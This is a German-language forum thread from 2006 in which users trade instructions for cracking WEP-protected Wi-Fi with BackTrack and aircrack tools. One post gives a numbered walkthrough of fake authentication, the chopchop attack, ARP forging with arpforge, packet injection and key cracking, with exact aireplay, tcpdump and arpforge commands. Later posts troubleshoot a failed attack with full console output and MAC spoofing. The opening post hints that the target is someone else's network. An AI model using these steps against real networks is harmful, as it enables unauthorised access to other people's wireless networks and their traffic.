Backtrack Hindernisse

Spongebob22 · Mai 19, 2006

Hallöle!

Betriebssystem Windows XP: ich benutze BackTrack und habe ein Centrino Notebook mit ipw2100 Driver, also integriertem Wlan...

monitor mode ist enabled, und Kismet funktioniert einwandfrei -> zeigt alles an in der Network List, jedoch bekomme ich mit aireplay: sending authentication Request -> Attack was unsuccessful (zum anderen Wlan)

Woran könnte dies liegen...kann bitte jemand helfen!?

Habe eingegeben:

airmon.sh start eth2 -> um Monitormodus zu starten

airodump eth0 /tmp/out 0 ->

BSSID, PWR, Beacons # Data, CH, MB, ENC, ESSID werden angezeigt, aber bei STATION, Packets Probes kommt nichts...warum? Muss jemand im WLAN arbeiten, um etwas abzufangen, oder warum wird nichts angezeigt?

Bogus · Mai 21, 2006

Original von Spongebob22
Hallöle!

Betriebssystem Windows XP: ich benutze BackTrack und habe ein Centrino Notebook mit ipw2100 Driver, also integriertem Wlan...

monitor mode ist enabled, und Kismet funktioniert einwandfrei -> zeigt alles an in der Network List, jedoch bekomme ich mit aireplay: sending authentication Request -> Attack was unsuccessful (zum anderen Wlan)

Woran könnte dies liegen...kann bitte jemand helfen!?

Habe eingegeben:

airmon.sh start eth2 -> um Monitormodus zu starten

airodump eth0 /tmp/out 0 ->

BSSID, PWR, Beacons # Data, CH, MB, ENC, ESSID werden angezeigt, aber bei STATION, Packets Probes kommt nichts...warum? Muss jemand im WLAN arbeiten, um etwas abzufangen, oder warum wird nichts angezeigt?

^^
jop wenn du glück hast mach ja seine vieren software irgendwann mal nen update höhö hust...

naked_chef · Mai 22, 2006

Original von Spongebob22
Muss jemand im WLAN arbeiten, um etwas abzufangen, oder warum wird nichts angezeigt?

Jepp!
es muss je traffic da sein um ihn auszuwerten.

bahl · Mai 23, 2006

WEP cracken, ohne möglichkeit des ARP capturen (z.B.kein Client):

So wie ich das bisher verstanden hab kann man ohne aktiven client (der einen Arp erzeugt) nur noch mit einem etwas umständlicheren Weg an einen Arp kommen.

Und zwar wird bei der Aircrack suite auch ein tolles progrämmchen namens Arpforge mitgeliefert.
Dieses Arpforge kann aus einem .xor file einen Arp zaubern.

Dieses .xor file bekommt man durch die chop chop Attacke, es enthält den Keystream des Pakets, den Arpforge zum Verschlüsseln eines Arps verwenden kann.

also, jetzt mal für alle dies versuchen wollen zum mitschreiben:
1. Einen client im AP einloggen (bei mac filter muss man die client mac vorher z.B. mit Kismet loggen um einen gültige zu bekommen)

aireplay -1 10 -e <SSID> -b <Apmac> -h <clientmac> <interface>

2.
dann versuchen wir mit der chop attacke ein Paket zu entschlüsseln.
Hier muss die clientmac die sein, die wir gerade eingeloggt haben.

aireplay -4 -b <APmac> -h <clientmac> <interface>

3.
jetzt müssen wir den IP bereich herausfinden, da wir ja nun ein entschlüsseltes Pack haben benutzen wir dieses auch Wink :

tcpdump -s 0 -n -e -r replay_dec-XXXX-XXXXXX.cap

das replay_dec-XXXX-XXXXXX.cap ist selbstverständlich nur ein Beispiel wie das von chop chop ausgespuckte file heißen könnte, hier verwendet ihr das .cap file das chop chop euch entschlüsselt gespeichert hat.

der Output sieht dann so aus:
"reading from file replay_dec-0627-022301.cap, link-type [...]
IP 192.168.1.2 > 192.168.1.255: icmp 64: echo request seq 1"

4.
jetzt kommen wir zu dem Arpforge prog.

arpforge replay_dec-XXXX-XXXXXX.xor 1 <APmac>
<clientMAC> 192.168.1.100 192.168.1.2 arp.cap

das replay_dec-XXXX-XXXXXX.xor ist das Keystream file, das wir von der chop chop erhalten haben.

<clientmac> ist wieder die eben eingeloggte MAC die wir auch schon für Aireplay verwendet haben.

192.168.1.100 ist eine source IP die im Netzwerk liegt.

Die hier wichtigste variable ist die destination IP (hier 192.168.1.2)
die haben wir eben durch das Auswerten des entschlüsselten Pakets erhalten. (siehe 3. tcpdump)

arp.cap ist das fertige Arp, das erzeugt wird.

5.
wenn alles funktionier hat, können wir jetzt wieder aireplay -3 starten, mit den in meinem ersten Post angegebenen (standard) Optionen.

6.
Jetzt injecten wir den eben erstellten Arp.

aireplay -2 -r arp.cap <interface>

nun können wir wieder mit den standard wepcracking Verfahren beginnen (mit airodump capuren und dann nach X IVs aircrack starten)

Quelle: http://www.wardriving-forum.de

Spongebob22 · Mai 23, 2006

Hört sich gut an, aber funktioniert nicht mit ipw 2100 -> ich muss erstmal meinen patchen (Kernel, Treiber und firmware) dann versuche ich es mal...

Hat jemand eine gute Patch-Anleitung.....war ja nur mal höflich gefragt

aber Danke @bahl

asterix · Nov 13, 2006

Hallo.

Die Anleitung von bahl ist echt super, ich habs auch schon oft angewendet und es funktionierte.
Jedoch hab ich neuerlich das Problem, dass das chop-choppen nicht so ganz funktioniert:

Ich logge einen client ein:
aireplay-ng -1 10 ?e <myssid> ?a <apmac> ?h <clientmac> ath0

ich choppe:
aireplay-ng -4 ?b <apmac> ?h <clientmac> ath0

Dann rattert er die Prozente rauf und es steht dann da:
Warning: ICV checksum verification FAILED!

Dadurch bleibt mir die Möglichkeit verwehrt, tcpdump zu benutzen. Wenn ich es trotzdem mache, stehen keine IP-Adressen da.

Wo ist hier der Fehler begraben, oder was muss aktiviert sein, dass diese Chopchop attake funktioniert.

Danke, asterix

bahl · Nov 14, 2006

das könnte daran liegen, das entweder beim übertragen Fehler auftraten und die response vom AP auf eine falsche Zieladdresse (bei verwenden von -h) oder eine falsche Source addresse (ohne verwenden von -h) gesendet wird.

weiterhin könnte es sein das der AP ein packet schickt, welches nicht den LLC/SNAP header verwendet, wobei dies äußerst unwahrscheinlich ist. aireplay nimmt an, das die ersten 6 bytes immer "\xAA\xAA\x03\x00\x00\x00" sind, was eigentlich für sämtliche gängigen protokolle auch zutrifft (ip mit tcp/udp; icmp; arp)

stimmt dies nun bei dem gegebenen packet nicht, dann wird ein falscher unverschlüsselter wert angenommen und die crc32 checksumme stimmt nicht. damit ist auch dein keystream ungültig und du kannst ihn nicht zum erstellen von validen packeten nehmen.

wenn du die zeile "The AP appears to drop packets shorter than %d bytes." liest, dann solltest du aufpassen das du nur ip bzw arp packete chopchopst, sonst kommt ebenfalls ein ungültiger keystream heraus und die ICV checksumme stimmt nicht...

asterix · Nov 14, 2006

hallo.

Nein, -h-Optionen werden korrekt angegeben, wie in deiner Anleitung.
Ich hab nen WRT45g-Router (v2.2) mit der dd-wrt firmware drauf. Kann ich da irgendwie nachschaun, ob dieser LLC/SNAP-Header verwendet wird?

"The AP appears to drop packets shorter than %d bytes." hab ich noch nirgends gelesen...

Kann es noch andere Gründe geben?

Danke für deine Antwort,
asterix

bahl · Nov 14, 2006

hmm... und du benutzt Version 0.6.2 von Aircrack-NG?

asterix · Nov 15, 2006

Nein, auf meiner "alten" Backtrack Final 1.0 ist noch die Version 0.5 drauf.

Werd mal austesten, ob das mit der neueren funktioniert, danke für den Hinweis,

asterix

bahl · Nov 16, 2006

unter Linux sollte man eh keine Probleme berichten, ausser man verwendet die aktuelle Stable

edit: oder neuer...

Sag uns wenns klappt!

asterix · Nov 19, 2006

So, ich habe nun meiner Backtrack 1.0 die neueste Version von aircrack verpasst.
Jedoch blieb der Versuch erfolglos...

Ich habe nun die einzellnen Schritte extra rauskopiert, vielleicht hilft das weiter

Zu allererst ändere ich mal die MAC-Adresse meiner WLAN-Karte

Code:

slax ~ # macchanger -m 00:11:22:33:44:55 ath0
Current MAC: 00:05:4e:xx:xx:xx (Philips Components)
Faked MAC:   00:11:22:33:44:55 (Cimsys Inc)

Danach gehe ich in den Monitor-Mode:

Code:

slax ~ # airmon-ng start ath0 6

usage: airmon-ng <start|stop> <interface> [channel]

Interface       Chipset         Driver

ath0            Atheros         madwifi (monitor mode enabled)

Danach logg ich mich ein. Die MAC dazu hab ich durch z.B. Kismet oder einen kurzen durchlauf von airodump-ng herausgefunden:

Code:

slax ~ # aireplay-ng -1 10 -e asterix -a 00:12:17:D4:6D:46 -h 00:11:22:33:44:55 ath0
20:07:26  Sending Authentication Request
20:07:26  Authentication successful
20:07:26  Sending Association Request
20:07:26  Association successful :-)

Nun kann man in airodump-ng den eingeloggten Client sehen:

Code:

slax ~ # airodump-ng -w out --channel 6 ath0

 CH  6 ][ Elapsed: 4 mins ][ 2006-11-19 20:11

 BSSID              PWR  Beacons   # Data  CH  MB  ENC   ESSID

 00:12:17:D4:6D:46   59     2770      253   6  48  WEP   asterix

 BSSID              STATION            PWR  Packets  Probes

 00:12:17:D4:6D:46  00:11:22:33:44:55   -1        3

Daraufhin chop' ich mal:

Code:

slax ~ # aireplay-ng -4 -b 00:12:17:D4:6D:46 -h 00:11:22:33:44:55 ath0


        Size: 78, FromDS: 1, ToDS: 0 (WEP)

             BSSID  =  00:12:17:D4:6D:46
         Dest. MAC  =  01:80:C2:00:00:00
        Source MAC  =  00:12:17:D4:6D:46

        0x0000:  0842 0000 0180 c200 0000 0012 17d4 6d46  .B............mF
        0x0010:  0012 17d4 6d46 003b d251 d900 57c0 0da4  ....mF.;.Q..W...
        0x0020:  9165 3010 7b08 febf 728c 8233 d603 a381  .e0.{...r..3....
        0x0030:  026c 7881 5020 a8a6 1309 0dd8 e539 5dfc  .lx.P .......9].
        0x0040:  34bc 95b4 a1dc bb4e 760a f118 99d9       4......Nv.....

Use this packet ? y

Saving chosen packet in replay_src-1119-201022.cap

Offset   77 ( 0% done) | xor = 28 | pt = F1 |  254 frames written in   763ms
Offset   76 ( 2% done) | xor = 1A | pt = 83 |  344 frames written in  1032ms
Offset   75 ( 4% done) | xor = 6C | pt = 74 |  135 frames written in   406ms
Offset   74 ( 6% done) | xor = 26 | pt = D7 |  101 frames written in   303ms
Offset   73 ( 9% done) | xor = AF | pt = A5 |  170 frames written in   509ms
Offset   72 (11% done) | xor = D3 | pt = A5 |  241 frames written in   723ms
Offset   71 (13% done) | xor = EB | pt = A5 |   66 frames written in   199ms
Offset   70 (15% done) | xor = 1E | pt = A5 |  239 frames written in   716ms
Offset   69 (18% done) | xor = 79 | pt = A5 |  204 frames written in   612ms
Offset   68 (20% done) | xor = 04 | pt = A5 |  239 frames written in   717ms
Offset   67 (22% done) | xor = 11 | pt = A5 |   31 frames written in    93ms
Offset   66 (25% done) | xor = 30 | pt = A5 |  207 frames written in   621ms
Offset   65 (27% done) | xor = BC | pt = 00 |   32 frames written in    96ms
Offset   64 (29% done) | xor = 34 | pt = 00 |  204 frames written in   612ms
Offset   63 (31% done) | xor = FC | pt = 00 |   67 frames written in   201ms
Offset   62 (34% done) | xor = 5F | pt = 02 |  240 frames written in   720ms
Offset   61 (36% done) | xor = 39 | pt = 00 |  102 frames written in   306ms
Offset   60 (38% done) | xor = F1 | pt = 14 |   32 frames written in    97ms
Offset   59 (40% done) | xor = D8 | pt = 00 |  240 frames written in   719ms
Offset   58 (43% done) | xor = 0D | pt = 00 |   67 frames written in   201ms
Offset   57 (45% done) | xor = 0B | pt = 02 |  205 frames written in   616ms
Offset   56 (47% done) | xor = 93 | pt = 80 |  207 frames written in   620ms
Offset   55 (50% done) | xor = E2 | pt = 44 |  588 frames written in  1764ms
Offset   54 (52% done) | xor = C5 | pt = 6D |  102 frames written in   307ms
Offset   53 (54% done) | xor = F4 | pt = D4 |   30 frames written in    89ms
Offset   52 (56% done) | xor = 47 | pt = 17 |  102 frames written in   307ms
Offset   51 (59% done) | xor = 93 | pt = 12 |  103 frames written in   308ms
Offset   50 (61% done) | xor = 78 | pt = 00 |   33 frames written in    99ms
Offset   49 (63% done) | xor = 6C | pt = 00 |  134 frames written in   403ms
Offset   48 (65% done) | xor = 82 | pt = 80 |  208 frames written in   622ms
Offset   47 (68% done) | xor = 81 | pt = 00 |   65 frames written in   196ms
Offset   46 (70% done) | xor = A3 | pt = 00 |  102 frames written in   307ms
Offset   45 (72% done) | xor = 03 | pt = 00 |   68 frames written in   203ms
Offset   44 (75% done) | xor = D6 | pt = 00 |  170 frames written in   510ms
Offset   43 (77% done) | xor = 77 | pt = 44 |  242 frames written in   726ms
Offset   42 (79% done) | xor = EF | pt = 6D |   67 frames written in   201ms
Offset   41 (81% done) | xor = 58 | pt = D4 |  170 frames written in   510ms
Offset   40 (84% done) | xor = 65 | pt = 17 |   67 frames written in   202ms
Offset   39 (86% done) | xor = AD | pt = 12 |  206 frames written in   616ms
Offset   38 (88% done) | xor = FE | pt = 00 |   67 frames written in   201ms
Offset   37 (90% done) | xor = 08 | pt = 00 |   32 frames written in    97ms
Offset   36 (93% done) | xor = FB | pt = 80 |   33 frames written in    99ms
Offset   35 (95% done) | xor = 10 | pt = 00 |  100 frames written in   301ms
Offset   34 (97% done) | xor = 30 | pt = 00 |  172 frames written in   516ms

Warning: ICV checksum verification FAILED!

Saving plaintext in replay_dec-1119-201044.cap
Saving keystream in replay_dec-1119-201044.xor

Completed in 20s (2.00 bytes/s)

Nun kann man dieses böse FAILED! sehen und natürlich kommt beim tcpdump nichts gscheides raus:

Code:

slax ~ # tcpdump -s 0 -n -e -r replay_dec-1119-200932.cap
reading from file replay_dec-1119-200932.cap, link-type IEEE802_11 (802.11)
20:09:32.771984 DA:01:80:c2:00:00:00 BSSID:00:12:17:d4:6d:46 SA:00:12:17:d4:6d:46 LLC,
dsap SNAP (0xaa), ssap SNAP (0xaa), cmd 0x03: oui Ethernet (0x000000),
ethertype Unknown (0x0000): Unnumbered, ui, Flags [Command], length 46

Hoffe auf Hilfe, was ich da falsch mache oder was da nicht passt, ich komm nicht drauf,
danke, asterix

bahl · Nov 19, 2006

die Packetsource sollte wohl schon die sein, welche du spezifizierst:

Code:

BSSID  =       00:12:17:D4:6D:46
Dest. MAC  =   01:80:C2:00:00:00
Source MAC  = 00:12:17:D4:6D:46

nimm ein packet wo die source stimmt... du kannst eines empfangen, wenn du abmeldest.

asterix · Nov 19, 2006

Ich verstehe nicht so ganz was du meinst mit: "nimm ein packet wo die source stimmt... du kannst eines empfangen, wenn du abmeldest."

Ich habe doch keinen Client, welchen ich abmelden könnte, außer dem fake-client 00:11:22:33:44:55 ... meinst du eine deauth. attake?

Bitte um Aufklärung,
asterix

bahl · Nov 19, 2006

BSSID=00:12:17

4:6D:46 = Source MAC=00:12:17

4:6D:46

Die Source mac übergibst du bei Aireplay mit "-h", hier hast du aber ein packet in dem die Source nicht stimmt.

Mach eines mit der FakeMAC 8)

asterix · Nov 19, 2006

so ganz blick ich da immer nicht durch ?(

laut deiner anleitung sollte es doch funktionieren mit:

Code:

slax ~ # aireplay-ng -4 -b 00:12:17:D4:6D:46 -h 00:11:22:33:44:55 ath0

ich hab daraufhin mal nen filter mit -s 00:11:22:33:44:55 eingebaut, und parallel dazu fleißig nen fake-client eingeloggt, jedoch bringt das auch nichts.

ich glaub ich bin da komplett auf der falschen spur...

asterix

d3vil · Dez 1, 2006

Original von asterix
So, ich habe nun meiner Backtrack 1.0 die neueste Version von aircrack verpasst.

Eine bescheidene Frage von mir: Wie hast Du dem Backtrack-iso die aktuelle Verion von aircrack verpasst? Also damit man die iso booten kann ohne es auf die HDD zu installieren?

asterix · Dez 1, 2006

ganz einfach: man lädt die aktuelle version aus dem internet runter und installiert sie dann.

in der readme steht genaueres. man benutzt dabei den befehl make.

asterix

d3vil · Dez 1, 2006

Original von asterix
ganz einfach: man lädt die aktuelle version aus dem internet runter und installiert sie dann.

in der readme steht genaueres. man benutzt dabei den befehl make.

asterix

Ich glaube, ich habe mich falsch ausgedürckt. Ich meinte folgendes:

Ich lade die Backtrack 1 final als iso herunter, darin ist antürlich die alte aircrack-suite. Wie packe ich da jetzt die aktuelle herein und erstelle dann ein iso, welches ich brennen kann, um davon dann zu booten. Also ich meine nicht, wie man aircrack installiert, wenn man zuvor Backtrack auf einer Festplatte installiert hat, sondern die Integration in das iso-image.

asterix · Dez 1, 2006

achso, nein, das hab ich nicht gemacht, ich habs nur in die livecd installiert (und müsste es jedesmal neu installieren).

Direkt in ein iso reininstallieren kann ich mir schwer vorstellen, das sowas funktioniert.

Außerdem is eh schon eine neue Backtrack drausen, wo die neuere Version drauf is...

asterix